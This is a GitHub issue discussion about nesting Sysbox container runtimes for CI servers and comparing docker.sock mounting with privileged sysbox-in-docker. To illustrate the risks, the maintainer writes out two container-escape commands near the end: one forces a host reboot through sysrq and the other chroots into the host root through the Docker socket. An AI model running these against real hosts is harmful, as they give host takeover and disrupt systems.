Sysbox Nesting (future support?)
I understand that sysbox nesting is currently a limitation.
Is this a feature that is ever planned on being supported in the future?
I'm aware of some solutions like the one in this Y Combinator comment. However, that comes with its drawbacks, as mentioned in the well-known "Using Docker-in-Docker for your CI or testing environment? Think twice." blog post.
I can see this being a common use case, such as for a CI server:
- You run your CI server in a Docker container.
- Each build job runs inside a container.
- The build jobs need to do things like build, publish, etc.
For this case, three levels deep may be adequate, but I'm sure there are less common but valid use cases that would involve many more levels of nesting.
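Schematically, the nesting I'm describing would look something like this (image names are hypothetical; the level-2 step is exactly the nested-Sysbox scenario that isn't supported today):

```shell
# Level 1: the CI server itself runs in a Sysbox container on the host
docker run --runtime=sysbox-runc -d --name ci-server my-ci-image

# Level 2: inside the CI server container, each build job would get its
# own Sysbox container (this is the currently unsupported nested case)
docker run --runtime=sysbox-runc --rm my-job-image

# Level 3: inside a job container, the job uses its own Docker daemon
docker build -t my-app . && docker push my-app
```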
Thanks @ScottG489 for filing the issue.
I think I see your point here:
- The CI server would run in a container deployed with Docker + Sysbox. This way the CI server can have a dedicated Docker daemon yet be well isolated from the underlying host.
- Inside that CI server, the jobs would run in containers. But some of those jobs may in turn need a Docker daemon (e.g., to build, publish, or run containers), so you want Docker-in-Docker inside the CI server, but want to avoid using privileged containers. That is, inside the CI server container, you want Docker + Sysbox installed.
Makes sense, and this would imply Sysbox itself running inside a Sysbox container (nested) as you suggested.
We don't have Sysbox nesting on the roadmap right now. It's certainly something we've thought about, but it's unlikely we will support it in the near future.
I'll label this issue as an epic though so we can track it here and see if we get more requests for this functionality.
Thanks again!
Great! Thanks for the quick reply, @ctalledo.
I believe I've found a temporary workaround, at least for my particular use case.
I'm mounting docker.sock on the outer-most container. Inside it, I run containers using the sysbox runtime. All of these sysbox containers seem to be sandboxed from the outermost container as well as from the host, which all makes sense.
Do you know any potential problems or vulnerabilities this could cause? From my initial tests everything looked good.
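For illustration, the workaround looks roughly like this (image names are hypothetical):

```shell
# On the host: run the CI server as a regular container, with the
# host's Docker socket mounted into it
docker run -d --name ci-server \
  -v /var/run/docker.sock:/var/run/docker.sock \
  my-ci-image

# Inside the CI server: jobs are created through the host's daemon,
# but with the sysbox-runc runtime, so each job is a well-isolated
# system container that can run its own inner Docker
docker run --runtime=sysbox-runc --rm my-job-image
```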
As a side note, I'm having trouble running sysbox inside AWS. None of the AMIs I've been able to find have the shiftfs module. Do you happen to have any info on this? I'm happy to create a separate issue for this, as it's a bit off topic.
I'm mounting docker.sock on the outer-most container. Inside it, I run containers using the sysbox runtime. All of these sysbox containers seem to be sandboxed from the outermost container as well as from the host, which all makes sense.
Just to make sure I get the config you are describing, is the following correct?
- You have a host with Docker + Sysbox installed.
- You are deploying the CI server as a regular container and mounting the host's Docker socket into it.
- The CI server is using the Docker + Sysbox on the host to deploy jobs.
- The jobs are running in Sysbox containers (which isolates them from the host properly and allows them to run inner docker containers as needed).
By the way, you may have seen these already, but we have a couple of blog posts describing different CI configs with GitLab + Sysbox and Jenkins + Sysbox that may be helpful (even if they don't apply in your particular case):
https://blog.nestybox.com/2020/10/21/gitlab-dind.html
https://blog.nestybox.com/2019/09/29/jenkins.html
Regarding your first comment, yes that's all just about correct.
Just to make sure we're on the same page, though: the jobs themselves are launched from the CI container, but since docker.sock is mounted into it from the host, they essentially run on the host, as you said.
I just took a look at the blog posts.
It looks like the solution in the Jenkins post suffers from the same problem I'm trying to solve. Although the outer-most container runs in Sysbox (so it can't interfere with the host), it mounts docker.sock into all of the nested "job" containers. This means that the separate jobs can actually interfere with each other, since they're all using the same Docker daemon; for instance, one job could docker kill another. Correct me if I'm wrong.
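If I understand that setup correctly, from inside any job container with the shared socket mounted, something like this would be possible (the container name is hypothetical):

```shell
# Every job talks to the same shared Docker daemon, so:
docker ps             # lists ALL containers on that daemon,
                      # including the other jobs
docker kill other-job # one job can terminate a sibling job
```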
Finished reading the GitLab post. It seems that it calls attention to the problem I mentioned above:
But there is a drawback:
- For CI jobs that interact with Docker, the isolation boundary is at the system container level rather than at the job level. That is, such a CI job could easily gain control of the system container and thus compromise the GitLab runner environment, but not the underlying host.
In any case, my other problem still remains in that I'm having a hard time finding an AMI that has shiftfs so that I can use the sysbox runtime in EC2.
Just to make sure we're on the same page, though: the jobs themselves are launched from the CI container, but since docker.sock is mounted into it from the host, they essentially run on the host, as you said.
Got it. I think your setup is fine, since Sysbox is giving you a strong isolation boundary between the CI jobs and the host.
In any case, my other problem still remains in that I'm having a hard time finding an AMI that has shiftfs so that I can use the sysbox runtime in EC2.
Let's move this thread to the sysbox discussion forum: https://github.com/nestybox/sysbox/discussions/121
@ctalledo I was perusing the Sysbox release notes (my favorite pastime) and I came across sysbox-in-docker.
I think I roughly get the idea, but was wondering if you could expand on how it relates to this issue a little. Does this functionality directly make progress on this issue?
At least compared to the docker.sock volume-mount method, in terms of isolation it seems to have the benefit of not having access to the host's Docker daemon, but all the drawbacks of using --privileged, along with whatever the implications are of the other required mounts (e.g., -v /var/tmp/sysbox-var-lib-docker:/var/lib/docker, etc.).
Hi @ScottG489,
Does this functionality directly make progress on this issue?
Not really, as it uses a privileged container and runs Sysbox inside it. This issue calls for deploying a Sysbox container and running Sysbox inside it, which is a significantly more difficult task (but one that we want to pursue in time).
Sysbox-in-Docker was meant to provide an easy way for folks to play around with Sysbox without having to install it on a host.
At least compared to the docker.sock volume-mount method, in terms of isolation it seems to have the benefit of not having access to the host's Docker daemon, but all the drawbacks of using --privileged, along with whatever the implications are of the other required mounts (e.g., -v /var/tmp/sysbox-var-lib-docker:/var/lib/docker, etc.).
That's correct. The sysbox-in-docker image includes a Docker daemon in it, so no connection to the host Docker daemon is required. But it uses a privileged container, so it's not ideal.
Note however that inner containers launched with the inner Docker + Sysbox are strongly isolated: those use the Linux user-namespace plus all the other isolation features of Sysbox. Thus, you can run untrusted workloads inside the inner Sysbox containers, even if the outer container is privileged.
Finally, the Sysbox test framework uses the sysbox-in-docker approach (though with a dedicated test image), because it allows us to play with Sysbox easily without messing up the host.
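For reference, a sysbox-in-docker deployment along these lines looks roughly as follows (the image name and exact set of mounts are illustrative; only the /var/tmp/sysbox-var-lib-docker mount comes from this thread, so check the Sysbox docs for the real invocation):

```shell
# A privileged outer container carrying its own Docker daemon + Sysbox
docker run --privileged --rm -it \
  -v /var/tmp/sysbox-var-lib-docker:/var/lib/docker \
  sysbox-in-docker-image

# Inside it, untrusted workloads still go into inner Sysbox containers,
# which are strongly isolated even though the outer container is not
docker run --runtime=sysbox-runc --rm untrusted-workload-image
```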
Thanks for the explanation.
It would seem that in both cases the inner containers would be strongly isolated, since they're running with Sysbox; but sysbox-in-docker is perhaps more isolated overall from the system, because the host won't see any of the containers spun up. However, would you say the sysbox-in-docker approach is more of a security risk due to requiring --privileged (and other mounts) vs using docker.sock?
However, would you say the sysbox-in-docker approach is more of a security risk due to requiring --privileged (and other mounts) vs using docker.sock
I think both approaches (i.e., --privileged vs mounting the Docker socket) pose a strong security risk, because either makes it very easy for the container to break out and take control of the host.
In the case of --privileged, there are well-known container escapes (you can Google them). You can even reboot the host from within the container with a simple write: echo 1 > /proc/sys/kernel/sysrq && echo b > /proc/sysrq-trigger.
In the case of mounting the host's Docker socket into a container, the container can use the host's Docker to deploy a privileged container that mounts the host's "/", gaining root access to the entire host.
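To make both escape routes concrete (these commands are illustrative; do not run them on a host you care about):

```shell
# Escape 1: inside a --privileged container, a write to the host's
# sysrq interface forcibly REBOOTS the host
echo 1 > /proc/sys/kernel/sysrq && echo b > /proc/sysrq-trigger

# Escape 2: with the host's docker.sock mounted, spawn a privileged
# container that binds the host's "/" and chroot into it as root
docker run -it --privileged -v /:/host alpine chroot /host /bin/sh
```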
It goes without saying that one of the reasons we built Sysbox is to avoid both of these scenarios by enabling strongly secured (rootless) containers to run any type of software in them (including Docker).